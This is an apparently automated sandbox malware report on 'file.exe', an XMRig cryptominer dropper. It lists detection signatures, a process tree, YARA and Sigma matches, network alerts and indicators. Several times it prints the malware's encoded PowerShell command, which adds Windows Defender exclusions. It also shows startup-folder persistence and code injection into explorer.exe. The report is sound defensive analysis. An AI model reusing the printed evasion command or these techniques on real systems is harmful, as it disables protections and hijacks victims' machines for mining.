Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1574031
MD5:53e3f2baca38239bd6025b9e18e5f202
SHA1:c8d0d5d1fcce95e253ad60d639f418ab3d98f094
SHA256:012789b93b6d8186346fd774b7e428a8982c409b59fa845ba196ae89ac6706cb
Tags:exeuser-Bitsight
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Xmrig cryptocurrency miner
.NET source code contains potential unpacker
AI detected suspicious sample
Drops VBS files to the startup folder
Encrypted powershell cmdline option found
Found direct / indirect Syscall (likely to bypass EDR)
Found strings related to Crypto-Mining
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates driver files
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: AspNetCompiler Execution
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 1536 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 53E3F2BACA38239BD6025B9E18E5F202)
    • powershell.exe (PID: 6696 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVwBpAG4AZABvAHMAQwBQAFUAcwB5AHMAdABlAG0ALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABXAGkAbgBkAG8AcwBDAFAAVQBzAHkAcwB0AGUAbQAuAGUAeABlAA== MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 4308 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • aspnet_compiler.exe (PID: 1012 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe" MD5: DF5419B32657D2896514B6A1D041FE08)
      • explorer.exe (PID: 6760 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
        • aspnet_compiler.exe (PID: 5628 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe" MD5: DF5419B32657D2896514B6A1D041FE08)
    • wscript.exe (PID: 1012 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindosCPUsystem.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • WindosCPUsystem.exe (PID: 6600 cmdline: "C:\Users\user\AppData\Roaming\WindosCPUsystem.exe" MD5: 53E3F2BACA38239BD6025B9E18E5F202)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000006.00000002.3379529073.0000000140360000.00000002.00000001.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      00000006.00000002.3379529073.0000000140360000.00000002.00000001.00020000.00000000.sdmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
      • 0x10c08:$a1: mining.set_target
      • 0x2e30:$a2: XMRIG_HOSTNAME
      • 0x57a8:$a3: Usage: xmrig [OPTIONS]
      • 0x2e08:$a4: XMRIG_VERSION
      00000000.00000002.2201146076.0000026B4888C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000000.00000002.2585182229.0000026B61CA0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          00000009.00000002.2333963744.0000022790D6C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            Click to see the 5 entries
            SourceRuleDescriptionAuthorStrings
            0.2.file.exe.26b61ca0000.7.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              6.2.explorer.exe.140000000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                6.2.explorer.exe.140000000.0.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
                • 0x36fe08:$a1: mining.set_target
                • 0x362030:$a2: XMRIG_HOSTNAME
                • 0x3649a8:$a3: Usage: xmrig [OPTIONS]
                • 0x362008:$a4: XMRIG_VERSION
                6.2.explorer.exe.140000000.0.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
                • 0x3b5561:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
                6.2.explorer.exe.140000000.0.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
                • 0x3b5dd8:$s1: %s/%s (Windows NT %lu.%lu
                • 0x3b9400:$s3: \\.\WinRing0_
                • 0x366fa8:$s4: pool_wallet
                • 0x3613d8:$s5: cryptonight
                • 0x3613e8:$s5: cryptonight
                • 0x3613f8:$s5: cryptonight
                • 0x361408:$s5: cryptonight
                • 0x361420:$s5: cryptonight
                • 0x361430:$s5: cryptonight
                • 0x361440:$s5: cryptonight
                • 0x361458:$s5: cryptonight
                • 0x361468:$s5: cryptonight
                • 0x361480:$s5: cryptonight
                • 0x361498:$s5: cryptonight
                • 0x3614a8:$s5: cryptonight
                • 0x3614b8:$s5: cryptonight
                • 0x3614c8:$s5: cryptonight
                • 0x3614e0:$s5: cryptonight
                • 0x3614f8:$s5: cryptonight
                • 0x361508:$s5: cryptonight
                • 0x361518:$s5: cryptonight
                Click to see the 1 entries

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVwBpAG4AZABvAHMAQwBQAFUAcwB5AHMAdABlAG0ALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABXAGkAbgBkAG8AcwBDAFAAVQBzAHkAcwB0AGUAbQAuAGUAeABlAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVwBpAG4AZABvAHMAQwBQAFUAcwB5AHMAdABlAG0ALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABXAGkAbgBkAG8AcwBDAFAAVQBzAHkAcwB0AGUAbQAuAGUAeABlAA==, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 1536, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVwBpAG4AZABvAHMAQwBQAFUAcwB5AHMAdABlAG0ALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmA
                Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\wscript.exe, SourceProcessId: 1012, StartAddress: A659BCC0, TargetImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, TargetProcessId: 1012
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindosCPUsystem.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindosCPUsystem.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 1536, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindosCPUsystem.vbs" , ProcessId: 1012, ProcessName: wscript.exe
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 1536, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe", ProcessId: 1012, ProcessName: aspnet_compiler.exe
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVwBpAG4AZABvAHMAQwBQAFUAcwB5AHMAdABlAG0ALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABXAGkAbgBkAG8AcwBDAFAAVQBzAHkAcwB0AGUAbQAuAGUAeABlAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVwBpAG4AZABvAHMAQwBQAFUAcwB5AHMAdABlAG0ALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABXAGkAbgBkAG8AcwBDAFAAVQBzAHkAcwB0AGUAbQAuAGUAeABlAA==, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 1536, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVwBpAG4AZABvAHMAQwBQAFUAcwB5AHMAdABlAG0ALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmA
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindosCPUsystem.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindosCPUsystem.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 1536, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindosCPUsystem.vbs" , ProcessId: 1012, ProcessName: wscript.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVwBpAG4AZABvAHMAQwBQAFUAcwB5AHMAdABlAG0ALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABXAGkAbgBkAG8AcwBDAFAAVQBzAHkAcwB0AGUAbQAuAGUAeABlAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVwBpAG4AZABvAHMAQwBQAFUAcwB5AHMAdABlAG0ALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABXAGkAbgBkAG8AcwBDAFAAVQBzAHkAcwB0AGUAbQAuAGUAeABlAA==, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 1536, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVwBpAG4AZABvAHMAQwBQAFUAcwB5AHMAdABlAG0ALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmA

                Data Obfuscation

                barindex
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\file.exe, ProcessId: 1536, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindosCPUsystem.vbs
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-12T20:36:19.985337+010020362892Crypto Currency Mining Activity Detected192.168.2.5640471.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-12T20:36:23.813794+010020542471A Network Trojan was detected154.216.20.243443192.168.2.549705TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-12T20:36:26.424321+010020446971A Network Trojan was detected192.168.2.549707154.216.20.243443TCP
                2024-12-12T20:37:23.355991+010020446971A Network Trojan was detected192.168.2.549835154.216.20.243443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeReversingLabs: Detection: 23%
                Source: file.exeReversingLabs: Detection: 23%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exeJoe Sandbox ML: detected
                Source: file.exeJoe Sandbox ML: detected

                Bitcoin Miner

                barindex
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: 6.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.3379529073.0000000140360000.00000002.00000001.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 6760, type: MEMORYSTR
                Source: explorer.exe, 00000006.00000002.3379529073.0000000140360000.00000002.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
